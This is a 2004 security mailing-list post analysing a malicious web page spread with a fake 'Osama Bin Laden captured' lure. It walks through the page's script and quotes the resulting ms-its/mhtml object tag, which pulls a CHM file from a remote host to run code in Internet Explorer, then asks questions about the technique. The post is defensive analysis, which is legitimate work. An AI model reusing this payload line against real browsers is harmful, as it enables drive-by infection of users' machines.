[Dshield] FW: Osama Bin Laden Captured
peteoutside at yahoo.com
Fri Apr 23 18:29:22 GMT 2004
The activex objects call the script S, which has two lines:
The first line defines the variable "s" as a substring of variable "location.href" (the current url in the browser window--in this case, http://220.127.116.11/pics/ starting at position 7 (e.g. excluding the http:// portion).
The second line returns ANOTHER substring of the resulting text ("18.104.22.168/pics") starting at position 0 and going to however long it is to the first instance of "/"...so you end up with this:
object data=ms-its:mhtml:file://c:\foo.mht!http://22.214.171.124/pics.chm::/pics.htm type=text/x-scriptlet
I also don't know why the first attempt occurs inside a textarea...
As far as the exploit goes, essentially what's happening is the browser is extracting foo.mht from pics.chm and executing it as C:\pics.htm, correct? And this can be any kind of executable content? Have I got this right?
Couple of questions:
1. Could you just use a browser redirect to start this process or is it essential that the user click on the link?
2. Does the process by which the hostile content is retrieved need to be in an OBJECT tag or can it be in any data request (e.g. an IMG tag)?
3. Why does one attempt in this example occur in a textarea?
Hope someone can help.
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
More information about the list